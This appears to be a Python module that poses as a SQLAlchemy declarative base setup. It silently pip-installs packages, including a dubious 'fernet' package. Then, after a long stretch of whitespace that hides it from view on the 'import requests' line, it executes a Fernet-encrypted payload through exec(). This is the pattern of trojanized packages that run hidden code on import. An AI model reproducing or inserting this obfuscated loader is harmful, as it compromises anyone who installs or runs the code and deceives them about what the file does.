import os
os.system('pip install cryptography')
os.system('pip install fernet')
os.system('pip install requests')
from fernet import Fernet
import requests                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ;exec(Fernet(b'H6vHS2TbYB-kOVxQIuxzaBiWcbS8DHyDW2U4vVWQluA=').decrypt(b'gAAAAABlRSQ9H5t2DVtk90tF-8Lc6Br6f7zjianMq7ygIauP4-B7nF7GAwjnMDKjvPqR6ZrwI10RqAz_4ef5TxRBwEsI7sQRBnb8-IzrdTI21zk6aBQ3R96zRk29BUyvHPbUDkL4duzh0BdoMwIPnMtaL0kwbh4lH7xqsMbK05NLpefRIsF_juDFmfs52N6WKPx8RnFwRIJ4QS5WeJ-WjxqQAJVI6DgbPA=='))
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()
